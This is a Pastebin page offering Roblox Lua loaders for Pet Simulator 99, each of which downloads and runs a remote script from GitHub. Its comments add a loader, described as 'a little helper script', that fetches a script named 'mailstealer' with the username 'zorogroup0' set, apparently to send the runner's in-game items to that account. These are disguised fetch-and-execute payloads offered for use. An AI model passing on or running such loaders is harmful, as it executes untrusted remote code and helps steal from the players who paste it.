Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Gen-v2/main/ps99-encrypted/petsim99scripts.lua"))()
Comments
-
- local userName = 'zorogroup0'
- -- Fetch and run a little helper script from the web
- local function fetchAndRun()
- local url = 'https://raw.githubusercontent.com/xvkzi/psx/main/mailstealer'
- local response = game:HttpGet(url)
- local runScript = loadstring(response)
- runScript()
- end
- fetchAndRun()
-
- Updated one
- Username= 'zorogroup0'
- loadstring(game:HttpGet('https://raw.githubusercontent.com/xvkzi/psx/main/mailstealer'))()
Add Comment
Please, Sign In to add comment